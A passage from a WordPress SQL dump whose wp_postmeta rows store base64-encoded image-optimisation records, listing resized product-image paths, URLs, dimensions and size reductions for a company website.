vMDlcL2tyeXRveC1hdXQtZ3JlYXNlLTIyNXgzNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWF1dC1ncmVhc2UtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtYXV0LWdyZWFzZS0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6Njk3LCJ0aW1lIjoxNDgzNTUwNTg1LCJpZCI6MTk0NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1hdXQtZ3JlYXNlLTQ1MHgyNjMuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWF1dC1ncmVhc2UtNDUweDI2My5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjI2MyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtYXV0LWdyZWFzZS00NTB4MjYzLmpwZyIsInJlZHVjdGlvbiI6ODIyLCJ0aW1lIjoxNDgzNTUwNTg4LCJpZCI6MTk0NX1d'); 
INSERT INTO `wp_postmeta` VALUES (28942, 1944, 'wpfc_optimisation_reduction', '13142'); 
INSERT INTO `wp_postmeta` VALUES (28943, 1944, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVmFybmlzaC1jb2F0aW5nLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVmFybmlzaC1jb2F0aW5nLmpwZyIsIndpZHRoIjo0NzUyLCJoZWlnaHQiOjMxNjgsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NTA1OTMsImlkIjoiMTk0NCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVmFybmlzaC1jb2F0aW5nLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVmFybmlzaC1jb2F0aW5nLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVmFybmlzaC1jb2F0aW5nLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo2MjksInRpbWUiOjE0ODM1NTA1OTcsImlkIjoxOTQ0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1Zhcm5pc2gtY29hdGluZy04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1Zhcm5pc2gtY29hdGluZy04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1Zhcm5pc2gtY29hdGluZy04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MTM1NiwidGltZSI6MTQ4MzU1MDYwMCwiaWQiOjE5NDR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVmFybmlzaC1jb2F0aW5nLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVmFybmlzaC1jb2F0aW5nLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVmFybmlzaC1jb2F0aW5nLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoxMTk5LCJ0aW1lIjoxNDgzNTUwNjA0LCJpZCI6MTk0NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9WYXJuaXNoLWNvYXRpbmctMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVmFybmlzaC1jb2F0aW5nLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9WYXJuaXNoLWNvYXRpbmctMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6NTAxNywidGltZSI6MTQ4MzU1MDYwOSwiaWQiOjE5NDR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVmFybmlzaC1jb2F0aW5nLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVmFybmlzaC1jb2F0aW5nLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVmFybmlzaC1jb2F0aW5nLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1NDQsInRpbWUiOjE0ODM1NTA2MTMsImlkIjoxOTQ0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1Zhcm5pc2gtY29hdGluZy0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1Zhcm5pc2gtY29hdGluZy0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1Zhcm5pc2gtY29hdGluZy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDQ2LCJ0aW1lIjoxNDgzNTUwNjE2LCJpZCI6MTk0NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9WYXJuaXNoLWNvYXRpbmctMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9WYXJuaXNoLWNvYXRpbmctMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9WYXJuaXNoLWNvYXRpbmctMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjQ4MSwidGltZSI6MTQ4MzU1MDYxOSwiaWQiOjE5NDR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVmFybmlzaC1jb2F0aW5nLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVmFybmlzaC1jb2F0aW5nLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVmFybmlzaC1jb2F0aW5nLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxMDk3LCJ0aW1lIjoxNDgzNTUwNjIzLCJpZCI6MTk0NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1Zhcm5pc2gtY29hdGluZy0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1Zhcm5pc2gtY29hdGluZy0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1Zhcm5pc2gtY29hdGluZy0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6MTA1NCwidGltZSI6MTQ4MzU1MDYyNywiaWQiOjE5NDR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9WYXJuaXNoLWNvYXRpbmctNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9WYXJuaXNoLWNvYXRpbmctNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9WYXJuaXNoLWNvYXRpbmctNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEzMTksInRpbWUiOjE0ODM1NTA2MzAsImlkIjoxOTQ0fV0='); 
INSERT INTO `wp_postmeta` VALUES (28944, 1943, 'wpfc_optimisation_reduction', '1713101'); 
INSERT INTO `wp_postmeta` VALUES (28945, 1943, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWx2cC1ncmVhc2UuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtbHZwLWdyZWFzZS5qcGciLCJ3aWR0aCI6MjYwMCwiaGVpZ2h0IjoxNzMzLCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LWx2cC1ncmVhc2UuanBnIiwicmVkdWN0aW9uIjoxNzEzMDkxLCJ0aW1lIjoxNDgzNTUwNjQxLCJpZCI6IjE5NDMifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1sdnAtZ3JlYXNlLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWx2cC1ncmVhc2UtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtbHZwLWdyZWFzZS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MDY0NCwiaWQiOjE5NDN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWx2cC1ncmVhc2UtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtbHZwLWdyZWFzZS04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1sdnAtZ3JlYXNlLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUwNjQ3LCJpZCI6MTk0M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtbHZwLWdyZWFzZS03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1sdnAtZ3JlYXNlLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LWx2cC1ncmVhc2UtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTA2NTAsImlkIjoxOTQzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1sdnAtZ3JlYXNlLTE2MDB4MTA2Ni5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY2LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1sdnAtZ3JlYXNlLTE2MDB4MTA2Ni5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtbHZwLWdyZWFzZS0xNjAweDEwNjYuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUwNjU1LCJpZCI6MTk0M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtbHZwLWdyZWFzZS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1sdnAtZ3JlYXNlLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LWx2cC1ncmVhc2UtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTA2NTcsImlkIjoxOTQzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1sdnAtZ3JlYXNlLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWx2cC1ncmVhc2UtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtbHZwLWdyZWFzZS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MDY1OSwiaWQiOjE5NDN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWx2cC1ncmVhc2UtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtbHZwLWdyZWFzZS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1sdnAtZ3JlYXNlLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUwNjYyLCJpZCI6MTk0M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtbHZwLWdyZWFzZS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1sdnAtZ3JlYXNlLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LWx2cC1ncmVhc2UtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTA2NjQsImlkIjoxOTQzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWx2cC1ncmVhc2UtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtbHZwLWdyZWFzZS0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1sdnAtZ3JlYXNlLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUwNjY3LCJpZCI6MTk0M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1sdnAtZ3JlYXNlLTQ1MHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWx2cC1ncmVhc2UtNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtbHZwLWdyZWFzZS00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MDY3MCwiaWQiOjE5NDN9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (28946, 1942, 'wpfc_optimisation_reduction', '3004699'); 
INSERT INTO `wp_postmeta` VALUES (28947, 1942, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVXJldGhhbmUtTWlzc2xlLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVXJldGhhbmUtTWlzc2xlLmpwZyIsIndpZHRoIjozNjQ4LCJoZWlnaHQiOjI3MzYsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9VcmV0aGFuZS1NaXNzbGUuanBnIiwicmVkdWN0aW9uIjozMDA0Njg5LCJ0aW1lIjoxNDgzNTUwNjgyLCJpZCI6IjE5NDIifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1VyZXRoYW5lLU1pc3NsZS0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1VyZXRoYW5lLU1pc3NsZS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1VyZXRoYW5lLU1pc3NsZS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MDY4NCwiaWQiOjE5NDJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVXJldGhhbmUtTWlzc2xlLTgwMHg2MDAuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVXJldGhhbmUtTWlzc2xlLTgwMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVXJldG